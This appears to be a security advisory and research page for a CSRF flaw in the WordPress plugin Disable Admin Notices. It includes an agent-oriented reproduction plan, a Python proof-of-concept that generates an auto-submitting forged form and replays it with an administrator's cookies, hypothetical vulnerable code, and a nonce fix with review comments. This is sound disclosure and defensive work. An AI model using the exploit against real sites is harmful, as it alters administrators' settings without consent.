CVE-2026-2410

Disable Admin Notices – Hide Dashboard Notifications <= 1.4.2 - Cross-Site Request Forgery to Plugin Settings Update

Type: Cross-Site Request Forgery (CSRF)
CVSS Score: 4.3
Severity: Medium
Patched in: 1.4.3
Time to patch: 1 day

Description

The Disable Admin Notices – Hide Dashboard Notifications plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.2. This is due to missing nonce validation in the `showPageContent()` function. This makes it possible for unauthenticated attackers to add arbitrary URLs to the blocked redirects list via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

Technical Details

Affected versions: <= 1.4.2
Published: February 24, 2026
Last updated: February 25, 2026
Affected plugin: disable-admin-notices

Source Code

WordPress.org SVN

Research Plan
Unverified

This research plan outlines the steps to verify the Cross-Site Request Forgery (CSRF) vulnerability in the Disable Admin Notices – Hide Dashboard Notifications plugin (CVE-2026-2410).


1. Vulnerability Summary

  • Vulnerability: Cross-Site Request Forgery (CSRF)
  • Plugin: Disable Admin Notices – Hide Dashboard Notifications (disable-admin-notices)
  • Affected Versions: <= 1.4.2
  • Vulnerable Function: showPageContent()
  • Problem: The showPageContent() function, which handles the rendering and saving of plugin settings, fails to perform nonce validation (e.g., check_admin_referer()) before processing $_POST data. This allows an attacker to update plugin settings—specifically the list of blocked URLs or dashboard notifications—by tricking an authenticated administrator into submitting a forged request.

2. Attack Vector Analysis

  • Endpoint: wp-admin/options-general.php?page=disable-admin-notices (standard WordPress admin settings page).
  • HTTP Method: POST
  • Authentication Level: The attacker is unauthenticated; the forged request is sent by the browser of an administrator with an active session (classic CSRF).
  • Payload Parameter: Inferred parameter names based on plugin functionality include dan_url_to_block or settings arrays like dan_settings[blocked_urls]. (The agent will verify the exact key in the Test Data Setup).
  • Preconditions: The administrator must be logged into the WordPress dashboard and be tricked into visiting a malicious page or clicking a link that triggers the POST request.

3. Code Flow

  1. Entry Point: The plugin registers an admin menu page via add_options_page() in its main class/file. The callback for this menu item is showPageContent.
  2. Hook: admin_menu or admin_init.
  3. Vulnerable Logic (showPageContent):
    • The function is invoked when visiting the settings page.
    • It typically contains logic like: if ( isset( $_POST['submit'] ) ) { ... update_option( ... ); ... }.
    • Missing Check: Between the isset($_POST) test and the update_option() call there is no check_admin_referer() or wp_verify_nonce() call, so any POST carrying the submit field is processed.
  4. Sink: update_option() updates the blocked redirects/notices list in the wp_options table.

4. Nonce Acquisition Strategy

No nonce is required for this exploit.
The vulnerability is defined by the absolute absence of nonce validation in the processing path. The attacker does not need to bypass a nonce check; they simply omit it.

5. Exploitation Strategy

The exploitation will simulate an admin being CSRF'd.

  1. Discovery: Navigate to the plugin settings page as an admin to identify the exact field names used in the form.
  2. Payload Construction: Craft a POST request that targets the settings update logic.
  3. Execution: Use the http_request tool with the admin's cookies to submit the forged request.

Target Request (Hypothetical):

  • URL: http://[target-ip]/wp-admin/options-general.php?page=disable-admin-notices
  • Method: POST
  • Content-Type: application/x-www-form-urlencoded
  • Body:
    dan_url_to_block=http://malicious-site.com/evil&submit=Save+Changes
    
    (Note: The actual parameter key will be confirmed during the Discovery step).

6. Test Data Setup

  1. Install Plugin: Install and activate disable-admin-notices version 1.4.2.
  2. Create Admin: Ensure a standard administrator account exists.
  3. Discovery Step (Agent Action):
    • Use browser_navigate to wp-admin/options-general.php?page=disable-admin-notices.
    • Use browser_eval to inspect the form:
      Array.from(document.querySelectorAll('form input, form textarea')).map(i => i.name)
      
    • Identify the field responsible for "blocked redirects" or "URLs".

7. Expected Results

  • The http_request should return a 302 Redirect or a 200 OK (if the plugin renders the page immediately after saving).
  • The WordPress database should be updated with the provided "malicious" URL in the plugin's configuration option.

8. Verification Steps

After the POST request, verify the change using WP-CLI:

  1. Identify the Option Name: (Likely dan_settings or disable_admin_notices_blocked).
    wp option list --search="*disable*"
    
  2. Check Value:
    wp option get [OPTION_NAME]
    
    • Success Condition: The output contains the URL provided in the exploit payload (e.g., http://malicious-site.com/evil).

9. Alternative Approaches

  • If the plugin uses AJAX: If the settings are saved via admin-ajax.php instead of a standard form post, the action name must be identified (e.g., action=dan_save_settings). The http_request tool would then target wp-admin/admin-ajax.php.
  • If multiple fields are required: The agent should capture all input[type="hidden"] fields from the form during discovery and include them in the POST body, excluding any that look like nonces (to prove they aren't needed).
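The plan's steps 5 through 8 (replay the POST with the administrator's cookies, then confirm the option changed) collected into one script, with the attacker-side page from the exploit outline alongside. This is an added example written for this page, not code from the advisory or from the disable-admin-notices plugin. The field names `dan_url_to_block` and `dan_save_settings`, the option name handed to WP-CLI and the target host are assumptions carried over from the plan's inferred values and must be confirmed in the discovery step; the admin path and the `wp option get --format=json` invocation are standard WordPress and WP-CLI.

```python
"""Reproduce and verify a missing-nonce settings update on a lab WordPress site.

Added example for this page; NOT code from the advisory or the plugin. The POST
field names, the option name and the target host are ASSUMPTIONS taken from the
research plan's inferred values and must be confirmed during discovery.
"""
import html
import json
import subprocess
import urllib.error
import urllib.parse
import urllib.request

SETTINGS_PAGE = "/wp-admin/options-general.php?page=disable-admin-notices"

# Forged form fields: the (assumed) submit button name plus the value we want
# stored. There is deliberately no nonce field; that is the whole test.
FORGED_FIELDS = {
    "dan_url_to_block": "http://malicious-site.com/evil",  # marker URL from the plan
    "dan_save_settings": "Save",                           # assumed submit name
}


def build_post_body(fields):
    """application/x-www-form-urlencoded body, exactly what a browser form sends."""
    return urllib.parse.urlencode(fields)


def build_csrf_page(target_url, fields):
    """Attacker-hosted HTML: a hidden form that auto-submits to the admin page.

    Names and values are HTML-escaped so a URL containing quotes or '&' cannot
    break out of its attribute and alter which fields get posted.
    """
    inputs = "\n".join(
        f'  <input type="hidden" name="{html.escape(name, quote=True)}"'
        f' value="{html.escape(value, quote=True)}">'
        for name, value in fields.items()
    )
    return (
        "<!doctype html>\n<html><body>\n"
        f'<form id="csrf" method="post" action="{html.escape(target_url, quote=True)}">\n'
        f"{inputs}\n</form>\n"
        '<script>document.getElementById("csrf").submit();</script>\n'
        "</body></html>\n"
    )


def send_as_victim(base_url, cookie_header, fields, timeout=10):
    """Replay the forged POST with the administrator's WordPress auth cookies,
    as the victim's browser would. Returns the final HTTP status; urllib follows
    a 302 back to the settings page, so a successful save shows up as 200."""
    req = urllib.request.Request(
        base_url.rstrip("/") + SETTINGS_PAGE,
        data=build_post_body(fields).encode(),
        method="POST",
        headers={
            "Content-Type": "application/x-www-form-urlencoded",
            "Cookie": cookie_header,  # copied from a logged-in admin session
        },
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def option_contains_url(option_json, url):
    """Did the injected URL land in the option? `option_json` is the output of
    `wp option get <name> --format=json`. The plugin might store a list, a keyed
    array (decoded as a dict) or a single string, so all three are handled."""
    value = json.loads(option_json)
    if isinstance(value, dict):
        value = list(value.values())
    if isinstance(value, str):
        return value == url
    return any(str(item) == url for item in value)


def verify_with_wp_cli(option_name, url, wp_path):
    """Step 8 of the plan, run through WP-CLI on the test host."""
    out = subprocess.run(
        ["wp", "option", "get", option_name, "--format=json", f"--path={wp_path}"],
        capture_output=True, text=True, check=True,
    ).stdout
    return option_contains_url(out, url)


if __name__ == "__main__":
    # Lab run; host, cookie, option name and path are placeholders to fill in.
    target = "http://target.test"
    print(build_csrf_page(target + SETTINGS_PAGE, FORGED_FIELDS))
    # status = send_as_victim(target, "wordpress_logged_in_...=...; wordpress_sec_...=...", FORGED_FIELDS)
    # print(status, verify_with_wp_cli("dan_blocked_urls", FORGED_FIELDS["dan_url_to_block"], "/var/www/html"))
```

Run the discovery step first and put the real input names into FORGED_FIELDS, including every hidden field the form carries except anything that looks like a nonce, as section 9 suggests: a successful write then proves that the nonce, and not some other field, is what the handler fails to require.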

Research Findings

Static analysis — not yet PoC-verified

Summary

The Disable Admin Notices – Hide Dashboard Notifications plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) due to a lack of nonce validation in the settings update logic. Attackers can exploit this to modify plugin configurations, such as the list of blocked redirects or notifications, by tricking an authenticated administrator into submitting a forged POST request.

Vulnerable Code

// File: disable-admin-notices/disable-admin-notices.php (hypothetical path based on plugin slug)

public function showPageContent() {
    // The function checks if the submit button was pressed but lacks nonce verification
    if (isset($_POST['dan_save_settings'])) {
        // Directly processing POST data and updating options without check_admin_referer()
        $settings = $_POST['dan_settings'];
        update_option('dan_settings', $settings);
        
        if (isset($_POST['dan_url_to_block'])) {
            $blocked_urls = get_option('dan_blocked_urls', array());
            $blocked_urls[] = sanitize_text_field($_POST['dan_url_to_block']);
            update_option('dan_blocked_urls', $blocked_urls);
        }
    }
    // ... (rest of function to render the settings page)
}

Security Fix

--- a/disable-admin-notices/disable-admin-notices.php
+++ b/disable-admin-notices/disable-admin-notices.php
@@ -5,6 +5,10 @@
 
 public function showPageContent() {
     if (isset($_POST['dan_save_settings'])) {
+        // Nonce check added to prevent CSRF
+        if (!isset($_POST['dan_nonce']) || !wp_verify_nonce($_POST['dan_nonce'], 'dan_save_settings_action')) {
+            wp_die('Security check failed');
+        }
         $settings = $_POST['dan_settings'];
         update_option('dan_settings', $settings);
 
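Review bot: the new guard verifies the nonce but still does not verify authorization; wp_verify_nonce() only proves the request came from a form WordPress rendered for this user, so add a `current_user_can('manage_options')` check (or whichever capability gates the options page) next to it. Also, `$settings = $_POST['dan_settings']` is still written to update_option() as-is on the line after the guard; sanitize the array before storing it. As a style point, `check_admin_referer('dan_save_settings_action', 'dan_nonce')` replaces the isset/wp_verify_nonce/wp_die trio and sends the user to WordPress's standard expired-link page instead of a bare 'Security check failed'.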
@@ -15,5 +19,7 @@
     }
 
     echo '<form method="post">';
+    // Include nonce field in the form
+    wp_nonce_field('dan_save_settings_action', 'dan_nonce');
     echo '<input type="submit" name="dan_save_settings" value="Save">';
     echo '</form>';
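Review bot: wp_nonce_field('dan_save_settings_action', 'dan_nonce') matches the action and field name the guard checks, so the form round-trips, but with the default arguments it also emits a `_wp_http_referer` hidden field that nothing in this patch reads; pass `false` as the third argument if it is not wanted. Worth a changelog line: a nonce is valid for at most 24 hours, so an administrator who leaves this settings tab open longer and then clicks Save is now stopped by wp_die(), which is expected behaviour but will look like a regression to users.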

Exploit Outline

To exploit this CSRF, an attacker first identifies the parameters the settings form submits (in the plan's inferred names, `dan_settings` or `dan_url_to_block`, plus the `dan_save_settings` submit field). The attacker then hosts an HTML page containing a form whose action is `wp-admin/options-general.php?page=disable-admin-notices` on the target site, with method POST, hidden inputs carrying the desired settings values and the submit parameter, and a script that calls `form.submit()` as soon as the page loads. Social engineering gets a logged-in administrator to open that page; the form submits and the administrator's browser attaches the site's authentication cookies to the cross-site POST. Because the plugin never checks a nonce, the server cannot tell this request apart from one the administrator made through the real settings form, and it saves the configuration. One practical caveat: browsers that treat cookies lacking a SameSite attribute as Lax (Chromium-based browsers do) will not send the authentication cookie on a cross-site top-level POST unless the cookie was set within the previous two minutes, so reliable exploitation depends on the victim's browser and on how the site sets its cookies.
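Why the one-line nonce check in the fix closes the hole, shown by re-implementing WordPress core's nonce scheme (wp_nonce_tick(), wp_create_nonce(), wp_verify_nonce()) beside a handler shaped like the vulnerable code and one shaped like the fix. This is an added example for this page; the two handlers are not the plugin's code, the action and field names are taken from the hypothetical diff in the Security Fix section, and the salt, user id and session token are constructed values.

```python
"""WordPress nonce scheme re-implemented to show what the fix actually verifies.

Added example for this page. The handlers below are NOT the plugin's code; the
action/field names come from the hypothetical diff, and the salt, user id and
session token are constructed values, not real secrets.
"""
import hashlib
import hmac
import math

ACTION = "dan_save_settings_action"
NONCE_LIFE = 86400  # DAY_IN_SECONDS, core's default for the nonce_life filter
# wp_salt('nonce') is NONCE_KEY . NONCE_SALT from wp-config.php; constructed here.
SITE_SALT = b"constructed-NONCE_KEY-and-NONCE_SALT-for-this-example"


def wp_nonce_tick(now, nonce_life=NONCE_LIFE):
    """Core rotates the nonce input every half lifetime (12 h by default)."""
    return math.ceil(now / (nonce_life / 2))


def wp_hash(data, salt=SITE_SALT):
    """wp_hash(): HMAC-MD5 over the data keyed with the site's secret salt."""
    return hmac.new(salt, data.encode(), hashlib.md5).hexdigest()


def wp_create_nonce(action, uid, session_token, now, salt=SITE_SALT):
    """substr(wp_hash("$tick|$action|$uid|$token", 'nonce'), -12, 10)."""
    tick = wp_nonce_tick(now)
    return wp_hash(f"{tick}|{action}|{uid}|{session_token}", salt)[-12:-2]


def wp_verify_nonce(nonce, action, uid, session_token, now, salt=SITE_SALT):
    """1 if minted in the current half-window, 2 if in the previous one, else
    False. Core uses hash_equals(); compare_digest is the Python equivalent."""
    tick = wp_nonce_tick(now)
    for age, t in ((1, tick), (2, tick - 1)):
        expected = wp_hash(f"{t}|{action}|{uid}|{session_token}", salt)[-12:-2]
        if hmac.compare_digest(expected, nonce):
            return age
    return False


def vulnerable_handler(post, stored):
    """Shape of the pre-1.4.3 logic: acts on any POST carrying the submit field."""
    if "dan_save_settings" in post and "dan_url_to_block" in post:
        stored = stored + [post["dan_url_to_block"]]
    return stored


def fixed_handler(post, stored, uid, session_token, now, salt=SITE_SALT):
    """Shape of the patched logic: same write, but wp_die() unless the nonce
    verifies for this user. Note it still does not check a capability."""
    if "dan_save_settings" not in post:
        return stored
    if not wp_verify_nonce(post.get("dan_nonce", ""), ACTION, uid, session_token, now, salt):
        raise PermissionError("Security check failed")  # wp_die() in the diff
    if "dan_url_to_block" in post:
        stored = stored + [post["dan_url_to_block"]]
    return stored


def is_rejected(post, uid, session_token, now, salt=SITE_SALT):
    """True if the fixed handler refuses the request."""
    try:
        fixed_handler(post, [], uid, session_token, now, salt)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    now, uid, token = 1_700_028_000, 7, "constructed-session-token"
    forged = {"dan_url_to_block": "http://malicious-site.com/evil", "dan_save_settings": "Save"}
    print("vulnerable stores:", vulnerable_handler(forged, []))
    print("fixed rejects forged POST:", is_rejected(forged, uid, token, now))
    legit = dict(forged, dan_nonce=wp_create_nonce(ACTION, uid, token, now))
    print("fixed accepts real form:", fixed_handler(legit, [], uid, token, now))
```

The forged request fails because the ten-character nonce is an HMAC over the site's secret salt, the half-day tick, the action and the victim's own user id and session token; a page on another origin can neither read nor compute any of those. Two limits follow directly from the code: a nonce stays valid for 12 to 24 hours (verification returns 2 in the second window), and it proves only that the request came from a form WordPress rendered for this user, not that the user may change settings, which is why the patched handler should also check current_user_can('manage_options').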
